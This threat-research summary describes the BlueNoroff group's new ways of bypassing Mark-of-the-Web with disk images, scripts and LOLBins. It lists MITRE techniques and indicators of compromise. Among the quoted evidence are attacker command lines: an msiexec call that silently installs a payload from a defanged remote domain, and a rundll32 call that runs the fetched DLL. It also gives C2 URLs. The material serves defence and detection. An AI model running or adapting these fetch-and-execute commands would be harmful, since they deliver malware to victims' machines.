Threat Research

BlueNoroff introduces new methods bypassing MoTW

Securonix

BlueNoroff group expanded its malware delivery methods to bypass Mark-of-the-Web (MOTW) protections by using ISO and VHD disk image formats, and began experimenting with Visual Basic Script, Windows Batch scripts, and a Windows executable. They also operated a large infrastructure of fake domains impersonating venture capital firms and banks, with a focus on Japanese financial entities and a UAE victim, indicating broad activity and targeted outreach.

Keypoints

  • BlueNoroff introduced new file types to evade Mark-of-the-Web (MOTW) security measures.
  • The group expanded delivery methods to include Visual Basic Script, Windows Batch scripts, and Windows executables.
  • They used LOLBins to evade detection, including concealment via msiexec and rundll32; LOLBin usage was explicitly described.
  • More than 70 domains were used, with many fake domains imitating venture capital and bank entities; the activity targets include Japanese financial entities.
  • A long-lasting initial infection involved a malicious Word document and a downloader that fetched the next payload, including a UAC bypass (ieinstal.exe).
  • New decoy and archive techniques were observed, such as a ZIP with Password.txt.lnk and Japanese-named decoy content, plus embedded VBScript and HTML Application payloads.
  • Updated methods include additional downloader scripts, RC4-encrypted configuration, and a Windows executable downloader showing a fake password to deceive victims.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The group usually takes advantage of Word documents and uses shortcut files for the initial intrusion. “The group usually takes advantage of Word documents and uses shortcut files for the initial intrusion.”
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – They executed several Windows commands to gather basic system information. “they executed several Windows commands to gather basic system information.”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Visual Basic Script used as part of the delivery chain. “The actor took advantage of several scripts, including Visual Basic Script and Windows Batch script.”
  • [T1204.001] User Execution: Malicious Link – The additional samples include malicious links activated by user actions, such as shortcut-driven execution. “The Shortcut file named “Password.txt.lnk” … to acquire the decoy password.”
  • [T1204.002] User Execution: Malicious File – Double-clicking a shortcut leads to execution of the next payload. “The command below was executed when the victim double-clicked on the shortcut file:”
  • [T1218.007] System Binary Proxy Execution: Msiexec – The downloader abuses msiexec to silently launch the Windows Installer payload. “msiexec -c /Q /i hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd & timeout”
  • [T1218.011] System Binary Proxy Execution: Rundll32 – The downloader uses rundll32 to execute fetched payload. “rundll32.exe %Profile%update.dll,#1 …”
  • [T1105] Ingress Tool Transfer – The malware fetches the next payload from a remote server. “The fetched payload is supposed to be saved in %Profile%update.dll.”
  • [T1027.002] Obfuscated Files or Information: Software Packing – The configuration is decrypted with RC4; RC4 key is embedded. “The malware decrypts the configuration data with the RC4 algorithm using an embedded 64-byte key.”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication and payload delivery over HTTP/HTTPS URLs. “Remote URL: https://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=”
  • [T1105] Ingress Tool Transfer (additional): – The malware uses RC4 and URL parameters to fetch payloads in different scenarios, including proxy handling via cURL. “The payload URL was delivered using a command line parameter” (and related cURL usage in updates).

Indicators of Compromise

  • [File Hash] 087407551649376d90d1743bac75aac8 – Downloader: regsile.exe
  • [File Hash] f766f97eb213d81bf15c02d4681c50a4 – Cur1Agent downloader
  • [File Hash] 61a227bf4c5c1514f5cbd2f37d98ef5 – Cur1Agent downloader
  • [File Hash] 4c0fb06320d1b7ecf44ffd0442fc10ed – Cur1Agent downloader
  • [File Hash] d8f6290517c114e73e03ab30165098f6 – Cur1Agent downloader
  • [File Hash] d3503e87df528ce3b07ca6d94d1ba9fc – Loader: E:Readme.exe / Job_Description.exe
  • [File Hash] 931d0969654af3f77fc1dab9e2bd66b1 – Loader: Job_Description.exe
  • [File Hash] 1e3df8ee796fc8a13731c6de1aed0818 – Zip archive: 新しいボーナススケジュール.zip
  • [File Hash] a17e9fc78706431ffc8b3085380fe29f – Malicious Virtual Disk File: Job_Description.vhd
  • [File Hash] 21e9ddd5753363c9a1f36240f989d3a9 – Password.txt.lnk (within ZIP)
  • [URL] hxxp://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=
  • [URL] hxxp://avid.lno-prima[.]lol/NafqhbXR7KC/rTVCtCpxPH/kMjTqFDDNt/fiOHK5H35B/bM%3D
  • [Domain] bankofamerica.us.org
  • [Domain] perseus.bond
  • [Domain] offerings.cloud

Read more: https://securelist.com/bluenoroff-methods-bypass-motw/108383/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint